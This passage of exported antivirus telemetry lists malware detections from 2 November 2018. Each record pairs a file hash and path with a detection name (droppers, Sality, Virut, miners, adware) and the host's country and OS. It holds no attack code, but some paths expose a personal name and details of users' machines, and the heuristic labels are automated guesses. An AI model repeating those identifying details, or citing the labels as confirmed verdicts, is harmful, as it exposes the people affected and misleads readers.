 [Row(detection=Row(filename='3b73bd498639ebc739e66da0b4199a1f532b20159f5d01485991b2f0bf50ca48', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\3B73BD498639EBC739E66DA0B4199A1F532B20159F5D01485991B2F0BF50CA48', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='3b73bd498639ebc739e66da0b4199a1f532b20159f5d01485991b2f0bf50ca48', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:20:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ngen.exe', filepath='E:\\金蝶K3\\K3_WISE_V14.3资源盘\\K3_Wise_V14.3_Resource\\OS_CHS\\DOTNETFX35\\sxs\\x86_netfx-ngen_exe_b03f5f7f11d50a3a_6.2.9200.16384_none_82bd772bfa7bef58\\ngen.exe', filesize=168000, name='W32/Sality.AT.#M1.#R1'), hash='5fc34a707e64a33a2924a26dc5ae158cb23e4c3e96eedf1b24c76c211217b138', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:04:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:28:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-121019-dd6b9a62', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_eb4a0c02\\AVSCAN-20181102-120848-D15FFC1A\\AVSCAN-20181102-121019-DD6B9A62', filesize=128000, name='Adware/Agent.1280.#M1.#R1'), hash='305d0081d755b81770db08626e400fbe69326af0d04dcba84e85811f664271fd', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T11:10:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered lecor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered lecor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='20f94b9918d2d4b8ba837df710b9f8b32efc249a3f913cf61e67c410e41599f4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:36:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-204219-12547da1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_48d360b5\\AVSCAN-20181102-200443-3AC05420\\AVSCAN-20181102-204219-12547DA1', filesize=832000, name='HEUR/AGEN.1025634.#M1.#R1'), hash='199d253e4b9c16a4a180c1446a0e523bfb0f703689cfc8e689da9b1194769bcc', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T12:42:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-02T17:09:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='3c3f20999efcb82259fe2ae42213e3c914e84535b917f10d7e622058896808c5', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\3C3F20999EFCB82259FE2AE42213E3C914E84535B917F10D7E622058896808C5', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='3c3f20999efcb82259fe2ae42213e3c914e84535b917f10d7e622058896808c5', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:14:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup.exe', filepath='G:\\softwear\\java\\setup.exe', filesize=980000, name='PUA/InstallCore.KV.#M0.#R0'), hash='305b5adcf5b7febb91ae344267f242058764a962c73c771c4894e14c674369a4', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='10', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T13:14:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='0bb1c7bdd19aec67347e68ecdca510472e8eb621ca77116220fcc9cbd7bc7eb4', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\0BB1C7BDD19AEC67347E68ECDCA510472E8EB621CA77116220FCC9CBD7BC7EB4', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='0bb1c7bdd19aec67347e68ecdca510472e8eb621ca77116220fcc9cbd7bc7eb4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:43:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\maintenancesservices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\McAfee\\VirusScan Enterprise\\x64\\McShield.exe', parentsize=181480, timestamp='2018-11-02T10:35:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-02-00-43-28.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-26T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T04:54:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='license generator_downloadly.exe', filepath='E:\\Nava\\Programs\\Etabs 2015\\Crack\\License Generator_DownLoadLy.exe', filesize=1152000, name='TR/Black.Gen2.#M300.#R100338'), hash='49122a4c62ca3899baaee3cbe273b2981a28785b1a12f1f5d2456df00079a019', metadata=Row(cmdline='--engine=2 --session-id=mCBIIkrDL0LwxRT0ZURvfXP4PtaIuem04qHzWKRm --registry-suffix=ESET --enable-crash-reporting --srt-field-trial-group-name=NewCleanerUIExperiment', country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\35.178.200\\software_reporter_tool.exe', parentsize=13460600, timestamp='2018-11-02T15:40:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='\\\\?\\c:\\windows\\system32\\maintenancesservices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:56:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='downloads.exe', filepath='C:\\Users\\X\\Downloads\\Downloads.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='3b8aa04b3f598a011ad5cd5d8faa0540738d632d768ae5d1a7c776557c31ec78', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T00:57:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered telet', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered telet', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='22b8fc26575cc8be0f9e6b0c8e672c5835aadc11a06990d6d111d9535096d5f9', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:49:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-235023-58111777', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5732cab4\\AVSCAN-20181102-220138-CABA3555\\AVSCAN-20181102-235023-58111777', filesize=128000, name='ADWARE/Adware.Gen.#M1.#R1'), hash='4f2c543edd9f54151ae962e25b743ac11b649e68ab9bcb8a66c0c5202edc2f7f', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:50:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~pp78ce.tmp', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\~pp78CE.tmp', filesize=128000, name='HEUR/AGEN.1030705.#M1.#R1'), hash='3dfb3bcd7618c2bc34a4b30c7062e1d0204afe188d4c326613667d5c1ce30a25', metadata=Row(cmdline=None, country='RS', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T19:14:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-080022-3e09c44e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4445c0e1\\AVSCAN-20181102-075759-2E42F5CA\\AVSCAN-20181102-080022-3E09C44E', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='3b8aa04b3f598a011ad5cd5d8faa0540738d632d768ae5d1a7c776557c31ec78', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T01:00:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-155803-e08d886b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-155607-D410DE34\\AVSCAN-20181102-155803-E08D886B', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:58:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-083031-b0318179', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_78554da8\\AVSCAN-20181102-082729-98D810FE\\AVSCAN-20181102-083031-B0318179', filesize=64000, name='TR/Siggen.64000.12.#M1.#R1'), hash='01bb8e327211e5fff9594e791c0abb322f765b94a3d0400e7eec9dad68e3310e', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:30:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T06:08:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:27:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:46:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:18:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='0d1593e54e93e09077e3ca8722f813d99da89241786fbc8a9bbce08446682b95', metadata=Row(cmdline=None, country='MK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:59:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1d88b04b4bc6ae15ef14b0e49c9b9673e3696ffc344533066bbe116ee15ffc48', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\1D88B04B4BC6AE15EF14B0E49C9B9673E3696FFC344533066BBE116EE15FFC48', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1d88b04b4bc6ae15ef14b0e49c9b9673e3696ffc344533066bbe116ee15ffc48', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-4.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\...\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-9.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:12:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:05:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:15:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mhautopatch.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa3016.39785\\msoxh\\MHAutoPatch.exe', filesize=2560000, name='TR/Black.Gen2.#M300.#R100338'), hash='3600f95d74d3eedb693c26f0533afc0ac366bd857770711dbe9dafee1340bc5a', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\msoxh (3).zip\\\\\\"', country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Desktop\\WinRAR.exe', parentsize=2199256, timestamp='2018-11-02T08:32:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='watermark.exe', filepath='C:\\Program Files\\Microsoft\\WaterMark.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='3632b39bd4d9197a14b2d1c1745b220f2d12c26a4d3efd42b269c7620cccbc82', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T18:37:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='41f4e1ca0527ef475d60ba8bb930c03a3b2118410faddb35c3fbd949298ae520', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-29\\41F4E1CA0527EF475D60BA8BB930C03A3B2118410FADDB35C3FBD949298AE520', filesize=812000, name='W32/Parite.#M1.#R1'), hash='41f4e1ca0527ef475d60ba8bb930c03a3b2118410faddb35c3fbd949298ae520', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:24:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='3dcc0f2f4a6c71d24c105c22ea053e1482f419f5aa927888f358eb1c72c564c4', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T07:10:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:42:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yolo.dll', filepath='Firmware.exe --> ProgramFilesDir/[PluginsDir]/yolo.dll', filesize=128000, name='PUA/Outbrowse.Gen.#M2.#R5697'), hash='46afe34ef9bcc3e2d76bd85f73235cabd22982b29ac85e5b8415ecb72fb10760', metadata=Row(cmdline=None, country='ES', os_name='MacOS', os_vmajor='16', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T20:48:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fvdxrjcm.exe', filepath='F:\\RECYCLER\\S-7-4-07-3262740328-8645573582-664574467-6068\\FvdXRJcM.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='07b87ade61aa3f13cba28a0c3adb65ae54116d76148b3fc9252519fea4a8d47d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-02T10:16:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0127409.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0127409.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='08f001bff3c666a6f70c117695c9e6c1d7d58659e5e5c351f6c7ca204eca8718', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:53:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:30:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-104702-8a243f1c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_12bb50e8\\AVSCAN-20181102-104532-7A6D5AA6\\AVSCAN-20181102-104702-8A243F1C', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:47:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-183742-b612c167', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_23c10ab5\\AVSCAN-20181102-173208-165F3A81\\AVSCAN-20181102-183742-B612C167', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='GE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:37:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:34:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='scvhost.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Roaming\\Update\\scvhost.exe', filesize=448000, name='APPL/BitCoinMiner.5.12.#M1.#R1'), hash='06c5e86be6dca55eda888cd820a30394eba9b9b69d2887f3d652a139ae00c371', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:54:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:36:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='alienshooter.exe', filepath='E:\\العاب\\Alien Shooter\\AlienShooter.exe', filesize=1024000, name='W32/Sality.AT.#M1.#R1'), hash='1758d8dab8946ca04a861877e9821b4e89b41bc340e549bc412193b502057933', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe5_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe5 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T18:30:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:29:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='zjxvtnrb.exe', filepath='F:\\RECYCLER\\S-1-5-12-2772410451-1313380861-030382565-1358\\ZjXVtNrb.exe', filesize=320000, name='W32/Virut.Gen.#M1.#R1'), hash='48865df4239b115f603b0ee3344dc0f61cebbd06250cd75c0e79bd11456bb0f5', metadata=Row(cmdline=None, country='MA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\UsbFix\\UsbFix.exe', parentsize=1999504, timestamp='2018-11-02T16:03:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='offerswizarddata.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\{4028119F-4610-4378-BDF0-3CD96553893B}\\OffersWizardData.dll', filesize=1792000, name='ADWARE/OffersWizard.1792000.#M1.#R1'), hash='68a5b5b209642b4dc351172859cb0cb7cdc19e6cdcbebc49be2b1209ea99e657', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:19:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='6a315014efeb7a5b1077522aab9b488ce719ecad7ac8ed576552a0e4778d3e9c', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\6A315014EFEB7A5B1077522AAB9B488CE719ECAD7AC8ED576552A0E4778D3E9C', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='6a315014efeb7a5b1077522aab9b488ce719ecad7ac8ed576552a0e4778d3e9c', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:16:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061910-2e5e419b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061910-2E5E419B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='j111.exe', filepath='J111.exe', filesize=1152000, name='DR/Delphi.6abe65.#M1.#R1'), hash='6abe6528568d3820b27e309c4369b24bf0f1dc41bf8c3774d9c2526104f6a5ff', metadata=Row(cmdline=None, country='DE', os_name='Linux', os_vmajor='3', os_vminor='14', parentproc=None, parentsize=None, timestamp='2018-11-02T06:55:05Z'), dt=datetime.date(2018, 11, 2)),
